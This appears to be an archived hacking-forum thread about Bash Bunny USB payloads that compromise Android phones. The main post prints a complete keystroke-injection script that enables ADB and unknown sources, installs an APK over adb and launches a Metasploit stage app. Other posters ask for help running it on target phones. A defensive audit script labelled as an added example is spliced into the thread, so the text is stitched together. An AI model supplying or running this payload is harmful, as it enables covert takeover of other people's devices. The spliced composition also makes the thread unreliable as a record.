
Android APK Install


r1ddl3r


Put together a quick and dirty Bash Bunny script. Allows unknown sources on an Android device, grabs the APK via the web browser, installs and opens it.

https://github.com/JakeBernier/bashbunny/blob/master/android/web_delivery/payload.txt

Also working to get the adb delivery method working. Curious if anyone knows of an Android keyboard shortcut that will quickly bring up settings to speed this up?


Cool payload, here's a couple of suggestions.

  1. Put the key commands in a text file under a folder called phones. This will allow someone else to modify the payload for numerous other phones.
    e.g. phones/nexus9_v7.0.txt, phones/galaxys7_v7.0.txt
  2. Use the bash bunny as an ethernet device and pull the payload from a webserver there, so you don't rely on any external infrastructure.

Good stuff!

One more note: you could start by trying the adb method in case the phone has USB debugging enabled. If not, you can fall back to the key commands. I am working on a similar payload for Android, but it doesn't have to do with APKs.


  • 1 year later...
I use this a lot myself.
# Enables ADB and unknown sources on a target Android
# Then pushes a payload APK via ADB
#
# Requires android-tools-adb installed on the Bash Bunny
#
# Purple ............Running HID emulation, enabling ADB and unknown sources
# Blue Blinking ...............Running ADB command to push payload.apk
# Red Blinking.......android failed to get an IP address from the Bash Bunny
# Green..............Finished
 
LED SETUP
GET TARGET_IP
GET SWITCH_POSITION
 
ATTACKMODE HID
LED ATTACK
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q DOWNARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 500
Q ENTER
Q DELAY 500
Q DOWNARROW
Q DELAY 800
Q ENTER
Q DELAY 800
Q ENTER
Q DELAY 500
Q DOWNARROW
Q DELAY 500
Q DOWNARROW
Q DELAY 500
Q ENTER
Q DELAY 200
Q ENTER
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
ATTACKMODE ECM_ETHERNET
LED B 2000
if [ -z "${TARGET_IP}" ]; then
    LED FAIL
    exit 1
fi
adb connect ${TARGET_IP}
adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk
adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"
LED FINISH
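A defender-side check for the three device changes the payload above makes (ADB enabled, unknown sources allowed, `com.metasploit.stage` installed). This is an added example, not part of any post in the thread; the snapshot format, the function names and the sample data are assumptions constructed here.

```shell
#!/usr/bin/env bash
# Added defensive example (not code from the thread).
# Audits a snapshot of an Android device for the state the payload leaves behind.

# collect_snapshot: run against a device you administer; needs adb on PATH.
# Note: install_non_market_apps is the global "unknown sources" switch on
# Android 7 and earlier; Android 8+ replaced it with a per-app permission.
collect_snapshot() {
    printf 'adb_enabled=%s\n' "$(adb shell settings get global adb_enabled | tr -d '\r')"
    printf 'install_non_market_apps=%s\n' \
        "$(adb shell settings get secure install_non_market_apps | tr -d '\r')"
    adb shell pm list packages | tr -d '\r'
}

# audit_snapshot: reads a snapshot on stdin, prints one line per finding,
# returns 0 when the snapshot is clean and 1 when anything was flagged.
audit_snapshot() {
    local line findings=0
    while IFS= read -r line; do
        case "$line" in
            adb_enabled=1)
                echo "FINDING: USB debugging (ADB) is enabled"
                findings=$((findings + 1)) ;;
            install_non_market_apps=1)
                echo "FINDING: installs from unknown sources are allowed"
                findings=$((findings + 1)) ;;
            package:com.metasploit.stage)
                echo "FINDING: package com.metasploit.stage is installed"
                findings=$((findings + 1)) ;;
        esac
    done
    [ "$findings" -eq 0 ]
}

# Constructed sample snapshots (not captured from a real device).
SAMPLE_TAMPERED='adb_enabled=1
install_non_market_apps=1
package:com.android.chrome
package:com.metasploit.stage'

SAMPLE_CLEAN='adb_enabled=0
install_non_market_apps=0
package:com.android.chrome'

# Demo on the constructed data; on a real device: collect_snapshot | audit_snapshot
printf '%s\n' "$SAMPLE_TAMPERED" | audit_snapshot || true
```
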

Hi there! Can you please explain a little bit about this technique, meaning what it is and why it is used? Or guide me to where I can find results about this... Actually I am a new hacker and have less knowledge in hacking Android... I can hack Android 5 and 4 easily with evil-droid or Metasploit or FatRat... so I need some more knowledge.. help.. Thank you!

 


  • 2 weeks later...
  • 2 weeks later...
On 9/24/2018 at 9:34 PM, Shadowharvy said:

I use this a lot myself.

Hello Shadowharvy,

I'm trying to execute a payload with a Samsung Galaxy S3. I have been working with the payload for Android url_open but can only download my APK. I'm interested in this part of your code: adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk. I think it is easier to just insert the USB Bash Bunny and it will search for our payload and execute it automatically.

How can I install this requirement? # Requires android-tools-adb installed on the Bash Bunny

Thanks


Archived

This topic is now archived and is closed to further replies.
